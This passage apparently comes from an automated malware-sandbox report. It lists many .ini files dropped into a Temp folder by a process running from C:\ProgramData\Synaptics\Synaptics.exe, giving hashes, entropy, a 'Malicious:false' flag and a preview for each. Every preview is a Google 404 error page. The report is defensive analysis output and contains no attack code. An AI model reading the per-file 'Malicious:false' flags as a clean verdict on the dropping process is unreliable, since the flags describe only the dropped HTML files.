                                                                                                                                                                                        SHA-512:242F4434A6719CB484E139CCEF1BC2C7F72E37EC98785F3EC77AF236001A6335A2B8CAB1C480B76584D2D13BDFF5396F9F8902A0B0355EDC2D0C433A73462C2B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="58Q2owDz+l88vL4S0xgpBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sQcZgsW.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268433504131028
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+4+pAZewRDK4mW
                                                                                                                                                                                        MD5:AA63F07B96DABC606D9573502F695802
                                                                                                                                                                                        SHA1:530096E8E3A6B6774652A20BD9BCCA9A3C8BB9C7
                                                                                                                                                                                        SHA-256:475EBB286E015A0AB1368CF9B1C2CCC19F736AB6071DDF4155607AA1BBFCD5B7
                                                                                                                                                                                        SHA-512:CF26FD4013EE9572C3C392E413B022E6D416BC74FE907BC2DA20F317C129FBC6EECC5FAF227BF3CE8CF8B0A24A375D8F8CC760C2A01AD4783448B275D0E5C636
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DpkGRC8UQovTJvLblSUUVg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\sTo33yZ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.245356585137941
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0RmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+6m+pAZewRDK4mW
                                                                                                                                                                                        MD5:78A81626E3763C53E4380914425370BB
                                                                                                                                                                                        SHA1:0C0C32BFB0754837BC79F541AA1DF3DDCA74147F
                                                                                                                                                                                        SHA-256:EFBE3F5631672A01541A699CFED8125748ABC3FDAD8918BF8F87686714772269
                                                                                                                                                                                        SHA-512:D18BB88F29C92428150C58CB484126239AD66F428B1E4EED3F5B29CD1B5A0151EEEEC45946A78BCA8416E3A66540CCCD2E4E6DDC2D531458391CC667844E76F4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oRf7aeicgzu7qt6iQevA0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\seknbEW.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269029908482332
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0wGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+a+pAZewRDK4mW
                                                                                                                                                                                        MD5:08DE112096FA45DA896911DC9CE0CEF2
                                                                                                                                                                                        SHA1:ACDDC822FFA88221F512C8CEC39E81EBB647AD83
                                                                                                                                                                                        SHA-256:FE7BD8B523A68FAAD8F8C28A290998D33F4F36FB25DE647C0B353B873B308E48
                                                                                                                                                                                        SHA-512:F1A2DF3DE2369184ACB83ED9C95DDCA7508EB73A05D5A3029A155235774592ACA2023E617C1172B0122EB8C658FA8A55259088E13344AD152D3CB049F8E01A81
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r+bbJp9gVMJKu88WnHFG1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tAqGSB8.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2718334002480285
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0LLxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+MLx+pAZewRDK4mW
                                                                                                                                                                                        MD5:E0B6EDBBC06F09BDE720C4809D098E90
                                                                                                                                                                                        SHA1:172A449BE0C789620FAC32AAF52123DA7409D245
                                                                                                                                                                                        SHA-256:BB0A29A7AA1F8957BA3D2F8FDCBFD72EE7BEBCFDB25660E8B13C11912C581698
                                                                                                                                                                                        SHA-512:A9C06FB99EBAAFB73656E3A84AB001BCFC1F90CF6AB999AC593CE1A75CA32CDACA91BF86E14E57EC7E8FDE38638C08FCC5D5D4BBC5B328D5D68A0BD476AFEFCB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/KZGHY6gtH2M8cI1qkSRSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\txIQV5h.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25926839699034
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0UQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+vQ+pAZewRDK4mW
                                                                                                                                                                                        MD5:4BF5BE3E9B60E4F7070E5DD7F49CCB8D
                                                                                                                                                                                        SHA1:50068A1BDAA461F76EB7F9BF41915EB9205972EC
                                                                                                                                                                                        SHA-256:B3DA8C59DA9A7C6AE794B5FA77AFB411E6DE55DB80E0DBDFB3B78ED08AD74F51
                                                                                                                                                                                        SHA-512:1336879E978F06AE70F247010CA36917909F264EE3521CE924F063290B147F245A68DBE75AB3EC18EC86F9BEA88B8BA09ACF8EFB2F11DCFD5CA35F809A61743D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BjtuJWX8pvrhrA2IcJpE1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\uNajBS6.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2673263403055355
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ACXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+GX+pAZewRDK4mW
                                                                                                                                                                                        MD5:46507C93C1CE69A51DE804A38BDF8D21
                                                                                                                                                                                        SHA1:421FB187CE29C5C5ADAA5444115D3C52A5C10CC6
                                                                                                                                                                                        SHA-256:561F1FC5FB50C33917E33178A0BCF1358EE8CDFA5FC75C89EE7E64A8FA4A9DE9
                                                                                                                                                                                        SHA-512:66C3A32351864511992FCF0A17899CB89DE5B47848FBFAFEF0DE679AB7B46BE5D806268D089BF76BC0F6FC9C28D64668A5616D6358CDDDE8525CAEDDBC4C9C6A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WL60TfbXj/CKazP3wdRq3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\uRtC2yG.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254409941368411
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0j3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+E+pAZewRDK4mW
                                                                                                                                                                                        MD5:A1828C72CFFBB722A6195F318C0E9600
                                                                                                                                                                                        SHA1:EC9C17147093DCF3D13DA999B4E3527AEED7AE9C
                                                                                                                                                                                        SHA-256:978AFBB2350F7999393DA383085FCBF0347E4DC04224F723719ABEA442F27639
                                                                                                                                                                                        SHA-512:4D540E8249032F0BB248E545103309A11ED36EAB2EC0460B8C5F0644E75238907CEE9ABBE77191AC9785A31F1077BA17E5B7FCBD098FCB3EEA65EB22E0334F06
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nx1Urhqq5pijR5j8FLUwXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\v3QjWiq.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263238858838279
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0qpSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+np+pAZewRDK4mW
                                                                                                                                                                                        MD5:79AD2D66A6A96E41EA7554268FC65ABD
                                                                                                                                                                                        SHA1:CE45E9D9512128B3E5F75C41BF6C705AFE4DE8D0
                                                                                                                                                                                        SHA-256:EF5489A0C9A56689C7EEC77881E9A4CEE9663A3A588E3D77EFE32800DDC5B80D
                                                                                                                                                                                        SHA-512:51150CD696C0600AA3979D348BC767F3C02FA97D5CDE0D8F365F201BDBE01151675F53FB46434E1AF732E15C07FE8DBAEFAC46DE4CDF4970E4016C0E31A3230D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PLFVle+5ndYioHB899oLGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vInMcpi.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254166694027385
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0hjxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+8x+pAZewRDK4mW
                                                                                                                                                                                        MD5:4EFF1E94620D4594475F5207F6E38EEC
                                                                                                                                                                                        SHA1:C24C510F76F0331FBD4318093F795578A22189C1
                                                                                                                                                                                        SHA-256:26C10484F64FEDDE41358B80B36E5D38A1A676E50749C83027A704B8174BAF2F
                                                                                                                                                                                        SHA-512:D5C8D55D46D8688F62B70E4A407EC3FDEDB13C659A017ED31E0B9A59B5ECE31C16B5F3A43A14355130C177A6E3F47488F2A723C1976BC1AAE776AD542A982201
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TZrp0OpsSr90FM4pP33t4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vPqtkkS.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2575348582098735
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+F+pAZewRDK4mW
                                                                                                                                                                                        MD5:C62096B45AFC19C4DD1F2C2462B6BFBE
                                                                                                                                                                                        SHA1:6C09848392F80927F7C45CC481E08E721377ECDF
                                                                                                                                                                                        SHA-256:83F129E0C0B4A9662760BEA9F68457BAE35D2AE222DBD6DA77148A7F87A02776
                                                                                                                                                                                        SHA-512:4B97FB9963B70E76D46F6538EB0CD6544D3FC53EBF4A08CA82B0E027EA074998551C49DA9BAC1BFE77B2ED155AF4283F0A91DE7E0DA652227CE2C3E93338E9F3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hM56lyW/cKqr9TNiNIdteQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vWJzCyM.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.259974635064794
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0AgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+xg+pAZewRDK4mW
                                                                                                                                                                                        MD5:F577DC6D9D11D959F2DAB70957DCCA9A
                                                                                                                                                                                        SHA1:F87399F0A16F943032F33225FCA753D918759AF9
                                                                                                                                                                                        SHA-256:BCB93404E6A1FDAC4C472EBEE1BE615A88ADC8A3E3EFE979445C0F4822171786
                                                                                                                                                                                        SHA-512:118D33910F3034663B760EFC42C1077F0930590353C515ECA13908A6B6F2FA4179C76B3A2764D3F12E20C0D11751966A0BD3A2CE77E9F619D24DE411C81CCE2C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YKwDBh4w85J3+DmasCde9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vWfJgIH.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.247664963180853
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0FSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+a+pAZewRDK4mW
                                                                                                                                                                                        MD5:11662A2616689F7518AAC2DE1F65C56A
                                                                                                                                                                                        SHA1:AFFC48594B584C535E2F25CFCE4780230D901D35
                                                                                                                                                                                        SHA-256:62100D1971F03C7BED00E5C6B03A8F035547F5FF7FCC82D667B3358E55950362
                                                                                                                                                                                        SHA-512:8CA35AD2AA27B37665C36CCDB4D8F80D82A3EC016A40412B6C0C858EB708B4CAFB01E8297555E32A6AEF219EEBB085612E90E9BB17F04D89B5F87F5A48C642BE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mgJ7mEYgcXwat2N/S+mp5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vZiTBgL.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263485443411523
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ZQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+qQ+pAZewRDK4mW
                                                                                                                                                                                        MD5:D0B2432F1AF805D123DAF47B37B620B9
                                                                                                                                                                                        SHA1:A76BB4C3139FE3DA6DB04538634925EA582E4282
                                                                                                                                                                                        SHA-256:31E369AF4D44515DDF2E61CA98770CCD6864531E30ABE2EBA82E74240DC74B7F
                                                                                                                                                                                        SHA-512:6D94E9595FCF72EA83152A923AC9EFA7D2DA76E40D3B5CF072CAE562F2BF3823B4E7CCA342BEB7D5916729A781827E2AE96290F5717F6E04047E77E68F1258F0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rVHsvQXaS7N2eHmK6eGM/w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\veLmU6M.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260324487342355
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0NSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                        MD5:CC79CC6785F1527F6144EFAAEF7FFD9D
